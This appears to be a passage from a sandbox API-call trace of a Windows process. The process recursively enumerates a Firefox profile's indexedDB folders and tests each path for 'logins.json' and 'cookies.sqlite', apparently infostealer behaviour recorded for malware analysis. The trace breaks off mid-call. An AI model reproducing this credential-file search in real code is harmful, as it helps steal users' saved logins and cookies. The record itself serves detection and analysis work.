[0161.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.209] lstrlenW (lpString="\\*.*") returned 4 [0161.209] GetProcessHeap () returned 0x8e0000 [0161.209] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*" [0161.209] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*", lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.209] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.209] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.209] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.209] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.209] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0161.209] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0161.209] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0161.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.210] lstrlenW (lpString="\\") returned 1 [0161.210] GetProcessHeap () returned 0x8e0000 [0161.210] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x925920 [0161.210] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0161.210] lstrlenW (lpString="moz-safe-about+home") returned 19 [0161.210] GetProcessHeap () returned 0x8e0000 [0161.210] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x9259f0 [0161.210] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.210] VirtualQuery (in: lpAddress=0x925920, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.210] GetProcessHeap () returned 0x8e0000 [0161.210] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925920 | out: hHeap=0x8e0000) returned 1 [0161.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.210] lstrlenW (lpString="") returned 0 [0161.210] GetProcessHeap () returned 0x8e0000 [0161.210] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x925ae8 [0161.210] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.210] lstrlenW (lpString="\\*.*") returned 4 [0161.210] GetProcessHeap () returned 0x8e0000 [0161.210] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925be0 [0161.210] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*" [0161.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0161.210] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.210] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.210] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.211] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.211] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0161.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.211] lstrlenW (lpString="\\") returned 1 [0161.211] GetProcessHeap () returned 0x8e0000 [0161.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925ce0 [0161.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.211] lstrlenW (lpString=".metadata") returned 9 [0161.211] GetProcessHeap () returned 0x8e0000 [0161.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x100) returned 0x925dd8 [0161.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" [0161.211] VirtualQuery (in: lpAddress=0x925ce0, lpBuffer=0x2ded78, dwLength=0x1c | out: lpBuffer=0x2ded78*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.211] GetProcessHeap () returned 0x8e0000 [0161.211] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ce0 | out: hHeap=0x8e0000) returned 1 [0161.211] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="logins.json") returned 0x0 [0161.211] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="cookies.sqlite") returned 0x0 [0161.211] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.211] GetProcessHeap () returned 0x8e0000 [0161.211] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.211] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0161.211] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0161.211] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0161.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.211] lstrlenW (lpString="\\") returned 1 [0161.211] GetProcessHeap () returned 0x8e0000 [0161.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925ce0 [0161.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.211] lstrlenW (lpString="idb") returned 3 [0161.211] GetProcessHeap () returned 0x8e0000 [0161.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925dd8 [0161.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.212] VirtualQuery (in: lpAddress=0x925ce0, lpBuffer=0x2ded78, dwLength=0x1c | out: lpBuffer=0x2ded78*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.212] GetProcessHeap () returned 0x8e0000 [0161.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ce0 | out: hHeap=0x8e0000) returned 1 [0161.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.212] lstrlenW (lpString="") returned 0 [0161.212] GetProcessHeap () returned 0x8e0000 [0161.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x917ba8 [0161.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.212] lstrlenW (lpString="\\*.*") returned 4 [0161.212] GetProcessHeap () returned 0x8e0000 [0161.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x917cc0 [0161.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*" [0161.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x2deb58 | out: lpFindFileData=0x2deb58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b80 [0161.212] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.212] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb58 | out: lpFindFileData=0x2deb58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.212] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.212] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.212] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb58 | out: lpFindFileData=0x2deb58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht", cAlternateFileName="818200~1")) returned 1 [0161.212] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0161.212] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0161.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.212] lstrlenW (lpString="\\") returned 1 [0161.212] GetProcessHeap () returned 0x8e0000 [0161.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x91b0b0 [0161.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 